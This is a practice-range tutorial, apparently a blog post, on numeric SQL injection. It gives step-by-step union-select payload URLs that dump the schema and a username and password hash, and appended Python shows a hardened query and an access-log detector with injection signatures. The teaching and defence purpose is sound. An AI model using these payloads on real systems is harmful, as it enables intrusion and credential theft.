Numeric SQL Injection Notes - Nanhack Practice Range

Numeric type

Characteristic: no single quote is needed to close a string
Example of a numeric statement: select * from table where id =2


1 - Append a single quote

Normal

http://www.nanhack.com/payload/sql/number.php?id=2

Error

http://www.nanhack.com/payload/sql/number.php?id=2'

2 - Append and 1=1

Normal

http://www.nanhack.com/payload/sql/number.php?id=2 and 1=1

Error

http://www.nanhack.com/payload/sql/number.php?id=2' and 1=1

3 - Append and 1=2

Error (no row returned)

http://www.nanhack.com/payload/sql/number.php?id=2 and 1=2

Error

http://www.nanhack.com/payload/sql/number.php?id=2' and 1=2
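The three probes above work because the id parameter is concatenated straight into the SQL text, so `'`, `and 1=1` and `and 1=2` are parsed as SQL rather than treated as data. The following Python, added here and not code from the original notes or from the range, puts that vulnerable construction beside a hardened one (integer whitelist plus a bound parameter) and classifies each probe the way the page does. It assumes an in-memory sqlite3 table standing in for the range's MySQL `admins` table (error text and comment syntax differ between the two; the splicing behaviour does not); table rows and function names are constructed for this example.

```python
import re
import sqlite3

# Constructed stand-in for the range's "admins" table, using sqlite3 instead of
# MySQL (assumption: error messages and comment syntax differ, the splicing does not).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admins (id integer, username text, email text)")
    conn.executemany(
        "insert into admins values (?, ?, ?)",
        [(1, "root", "root@example.invalid"), (2, "0236", "00000@qq.com")],
    )
    return conn

def lookup_vulnerable(conn, id_param):
    """Concatenates the raw id parameter into the statement, which is the
    construction the probes on the page reveal: whatever follows id= is parsed
    as SQL, so no quote is needed to break out of a string."""
    sql = "select * from admins where id = " + id_param
    return conn.execute(sql).fetchall()

# Whitelist: an optional sign and up to ten digits; anything else is rejected.
INT_RE = re.compile(r"-?\d{1,10}")

def lookup_hardened(conn, id_param):
    """Accepts only an integer and binds it as a parameter, so the value can
    never be parsed as SQL."""
    if not INT_RE.fullmatch(id_param):
        raise ValueError("id must be an integer")
    sql = "select * from admins where id = ?"
    return conn.execute(sql, (int(id_param),)).fetchall()

def probe(conn, lookup, id_param):
    """Classify one request the way the page's tests do: ("normal", rows) when
    the query ran, ("error", exception name) when it did not."""
    try:
        rows = lookup(conn, id_param)
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)
    return ("normal", rows)

if __name__ == "__main__":
    conn = make_db()
    for value in ("2", "2'", "2 and 1=1", "2 and 1=2"):
        print(f"{value!r:14} vulnerable={probe(conn, lookup_vulnerable, value)} "
              f"hardened={probe(conn, lookup_hardened, value)}")
```

Against the vulnerable lookup the three probes give exactly the normal / error / empty-result pattern listed above; against the hardened lookup every one of them is refused before any SQL runs, and only the bare integer returns a row. Note that a database-side cast alone is not a substitute for the whitelist: the check has to happen before the value is placed in the statement.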

The numeric injection steps are as follows:

Determine the number of columns

Enter 1 through 9: error

http://www.nanhack.com/payload/sql/number.php?id=6 union select 1,2,3,4,5,6,7,8,9#

Enter 1 through 8: normal

http://www.nanhack.com/payload/sql/number.php?id=6 union select 1,2,3,4,5,6,7,8#

The result obtained is as follows

select * from admins where id=6 union select 1,2,3,4,5,6,7,8
-----------------------------
用户名: 0236
邮箱:00000@qq.com
So the table has 8 columns

Find the injection point

id=-6: the query before the union must return nothing, so that the result of the statement after the union is displayed

Enter

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,2,3,4,5,6,7,8-- 

The result obtained is as follows

select * from admins where id=-6 union select 1,2,3,4,5,6,7,8--
-----------------------------
用户名: 2
邮箱:4

Injection point found


Guess the database name

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,database(),3,4,5,6,7,8#

Result

select * from admins where id=-6 union select 1,database(),3,4,5,6,7,8
-----------------------------
用户名: nanhack
邮箱:4

Dump the table names and the database version

group_concat(table_name) concatenates the dumped table names into a single string

Enter

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()#

Result

select * from admins where id=-6 union select 1,version(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()
-----------------------------
用户名: 5.5.58
邮箱:admin_logs,admins,class,facebook,kaiban,message,news,user

Dump the columns of the user table

Enter

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'#

Result

select * from admins where id=-6 union select 1,version(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'
-----------------------------
用户名: 5.5.58
邮箱:id,username,password

Dump the contents of the user table

Enter

http://www.nanhack.com/payload/sql/number.php?id=-6 union select 1,version(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user#

Result

select * from admins where id=-6 union select 1,version(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user
-----------------------------
用户名: 5.5.58
邮箱:admin@e10adc3949ba59abbe56e057f20f883e
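Every request in the procedure above leaves a distinctive trace in the web server's access log: the id parameter is no longer a bare integer, and it carries union/select, information_schema, a comment marker or a quote. The following Python, added here and not part of the original notes, scans access-log lines for such requests. The log lines are constructed for this example (modelled on the page's requests, percent-encoded as a client would send them), and the set of parameters expected to be integers is an assumption; the decisive check is simply whether the parameter is an integer, the signature list only explains which technique was attempted.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2021:17:20:01 +0800] "GET /payload/sql/number.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2021:17:20:09 +0800] "GET /payload/sql/number.php?id=2%27 HTTP/1.1" 500 0
10.0.0.5 - - [12/Mar/2021:17:20:15 +0800] "GET /payload/sql/number.php?id=2%20and%201%3D2 HTTP/1.1" 200 300
10.0.0.5 - - [12/Mar/2021:17:21:02 +0800] "GET /payload/sql/number.php?id=-6%20union%20select%201,2,3,4,5,6,7,8--%20 HTTP/1.1" 200 540
10.0.0.5 - - [12/Mar/2021:17:22:40 +0800] "GET /payload/sql/number.php?id=-6%20union%20select%201,version(),3,group_concat(table_name),5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database()%23 HTTP/1.1" 200 600
10.0.0.7 - - [12/Mar/2021:17:23:00 +0800] "GET /payload/sql/number.php?id=17 HTTP/1.1" 200 512
"""

# Combined-format line: client ip, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumption for this example: these query parameters must be integers.
NUMERIC_PARAMS = {"id"}

# Signatures that name the technique seen on the page; purely explanatory.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("boolean-probe", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("sql-comment", re.compile(r"(--|#|/\*)")),
    ("quote", re.compile(r"'")),
]

def analyse_target(target):
    """Return the reasons a request target looks like numeric SQL injection,
    or an empty list when every numeric parameter is a plain integer."""
    reasons = []
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)   # percent-decodes values
    for name in sorted(NUMERIC_PARAMS):
        for value in params.get(name, []):
            if not re.fullmatch(r"-?\d+", value.strip()):
                reasons.append(f"{name}: non-integer value {value!r}")
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    reasons.append(f"{name}: {label}")
    return reasons

def scan_log(text):
    """Return [(ip, target, reasons)] for every parseable line whose numeric
    parameters are suspicious, in log order."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = analyse_target(match["target"])
        if reasons:
            hits.append((match["ip"], match["target"], reasons))
    return hits

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target)
        for reason in reasons:
            print("   ", reason)
```

Run over the constructed log, the two plain-integer requests pass and the four probe requests are reported, each with the technique it matches (quote, boolean probe, union select, information_schema). Because the integer check fires on its own, a payload that evades every signature is still flagged; the signatures exist so an analyst can see at a glance how far along the page's procedure the client got.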
posted @ 2021-03-12 17:29  codeace